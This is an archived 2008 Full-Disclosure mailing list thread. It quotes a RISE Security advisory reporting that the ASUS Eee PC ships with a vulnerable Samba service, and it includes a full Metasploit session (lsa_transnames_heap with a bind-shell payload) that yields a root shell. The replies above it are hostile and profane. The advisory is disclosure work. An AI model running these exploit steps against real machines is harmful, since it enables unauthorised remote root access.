lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <591fd0b20802081207k39b2bfd9ub67b27e6c50d164c@mail.gmail.com>
Date: Fri, 8 Feb 2008 15:07:57 -0500
From: "Stack Smasher" <stacksmasher@...il.com>
To: reepex <reepex@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: ASUS Eee PC rooted out of the box

It is a remote root exploit on a very popular piece of hardware, you don't
think that is a big deal?


Who the fuck rattled your cage anyway? What did you ever contribute for us
to all bow down to receive your piss stream?





On Feb 8, 2008 2:38 PM, reepex <reepex@...il.com> wrote:

> So you ran metasploit and then made a blog post. Is this what 'security
> research' is considered now? And why did you write this is such a media
> hyped way? Trying to get some spotlight?
>
>
> On Feb 8, 2008 10:47 AM, RISE Security <advisories@...esecurity.org>
> wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > We recently acquired an ASUS Eee PC (if you want to know more about it,
> > a lot of reviews are available on internet). The first thing we did when
> > we put our hands at the ASUS Eee PC was to test its security. The ASUS
> > Eee PC comes with a customized version of Xandros operating system
> > installed, and some other bundled software like Mozilla Firefox, Pidgin,
> > Skype and OpenOffice.org.
> >
> > Analysing the running processes of the ASUS Eee PC, the first thing that
> > caught our attention was the running smbd process (the sshd daemon was
> > started by us, and is not enabled by default).
> >
> >
> > eeepc-rise:/root> ps -e
> >  PID TTY          TIME CMD
> >    1 ?        00:00:00 fastinit
> >    2 ?        00:00:00 ksoftirqd/0
> >    3 ?        00:00:00 events/0
> >    4 ?        00:00:00 khelper
> >    5 ?        00:00:00 kthread
> >   25 ?        00:00:00 kblockd/0
> >   26 ?        00:00:00 kacpid
> >  128 ?        00:00:00 ata/0
> >  129 ?        00:00:00 ata_aux
> >  130 ?        00:00:00 kseriod
> >  148 ?        00:00:00 pdflush
> >  149 ?        00:00:00 pdflush
> >  150 ?        00:00:00 kswapd0
> >  151 ?        00:00:00 aio/0
> >  152 ?        00:00:00 unionfs_siod/0
> >  778 ?        00:00:00 scsi_eh_0
> >  779 ?        00:00:00 scsi_eh_1
> >  799 ?        00:00:00 kpsmoused
> >  819 ?        00:00:00 kjournald
> >  855 ?        00:00:00 fastinit
> >  857 ?        00:00:00 sh
> >  858 ?        00:00:00 su
> >  859 tty3     00:00:00 getty
> >  862 ?        00:00:00 startx
> >  880 ?        00:00:00 xinit
> >  881 tty2     00:00:06 Xorg
> >  890 ?        00:00:00 udevd
> >  952 ?        00:00:00 ksuspend_usbd
> >  953 ?        00:00:00 khubd
> >  1002 ?        00:00:00 acpid
> >  1027 ?        00:00:00 pciehpd_event
> >  1055 ?        00:00:00 ifplugd
> >  1101 ?        00:00:00 scsi_eh_2
> >  1102 ?        00:00:00 usb-storage
> >  1151 ?        00:00:00 icewm
> >  1185 ?        00:00:01 AsusLauncher
> >  1186 ?        00:00:00 icewmtray
> >  1188 ?        00:00:01 powermonitor
> >  1190 ?        00:00:00 minimixer
> >  1191 ?        00:00:00 networkmonitor
> >  1192 ?        00:00:00 wapmonitor
> >  1193 ?        00:00:00 x-session-manag
> >  1195 ?        00:00:00 x-session-manag
> >  1200 ?        00:00:00 x-session-manag
> >  1201 ?        00:00:00 dispwatch
> >  1217 ?        00:00:00 cupsd
> >  1224 ?        00:00:00 usbstorageapple
> >  1234 ?        00:00:00 kondemand/0
> >  1240 ?        00:00:00 portmap
> >  1248 ?        00:00:00 keyboardstatus
> >  1272 ?        00:00:00 memd
> >  1279 ?        00:00:00 scim-helper-man
> >  1280 ?        00:00:00 scim-panel-gtk
> >  1282 ?        00:00:00 scim-launcher
> >  1297 ?        00:00:00 netserv
> >  1331 ?        00:00:00 asusosd
> >  1476 ?        00:00:00 xandrosncs-agen
> >  1775 ?        00:00:00 dhclient3
> >  2002 ?        00:00:00 nmbd
> >  2004 ?        00:00:00 smbd
> >  2005 ?        00:00:00 smbd
> >  2322 ?        00:00:00 sshd
> >  2345 ?        00:00:00 sshd
> >  2356 pts/0    00:00:00 bash
> >  2362 pts/0    00:00:00 ps
> > eeepc-rise:/root>
> >
> >
> > Retrieving the the smbd version, we discovered that it runs a vulnerable
> > version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
> > we published earlier last year.
> >
> >
> > eeepc-rise:/root> smbd --version
> > Version 3.0.24
> > eeepc-rise:/root>
> >
> >
> > With this information, we ran our exploit against the ASUS Eee PC using
> > the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> > Debian based).
> >
> >
> > msf > use linux/samba/lsa_transnames_heap
> > msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> > RHOST => 192.168.50.10
> > msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> > PAYLOAD => linux/x86/shell_bind_tcp
> > msf exploit(lsa_transnames_heap) > show targets
> >
> > Exploit targets:
> >
> >   Id  Name
> >   --  ----
> >   0   Linux vsyscall
> >   1   Linux Heap Brute Force (Debian/Ubuntu)
> >   2   Linux Heap Brute Force (Gentoo)
> >   3   Linux Heap Brute Force (Mandriva)
> >   4   Linux Heap Brute Force (RHEL/CentOS)
> >   5   Linux Heap Brute Force (SUSE)
> >   6   Linux Heap Brute Force (Slackware)
> >   7   DEBUG
> >
> >
> > msf exploit(lsa_transnames_heap) > set TARGET 1
> > TARGET => 1
> > msf exploit(lsa_transnames_heap) > exploit
> > [*] Started bind handler
> > [*] Creating nop sled....
> > ...
> > [*] Trying to exploit Samba with address 0x08415000...
> > [*] Connecting to the SMB service...
> > [*] Binding to
> > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > ...
> > [*] Bound to
> > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > ...
> > [*] Calling the vulnerable function...
> > [+] Server did not respond, this is expected
> > [*] Command shell session 1 opened (192.168.50.201:33694 ->
> > 192.168.50.10:4444)
> > msf exploit(lsa_transnames_heap) > sessions -i 1
> > [*] Starting interaction with 1...
> >
> > uname -a
> > Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> > GNU/Linux
> > id
> > uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
> >
> >
> > Easy to learn, Easy to work, Easy to root.
> >
> >
> > The original blog post and more information can be found in our
> > website at http://risesecurity.org/.
> >
> > Best regards,
> > RISE Security
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.2.6 (GNU/Linux)
> >
> > iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
> > 6tg6XRBCWHfPWFrSdVKu5oA=
> > =OFwe
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"If you see me laughing, you better have backups"

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ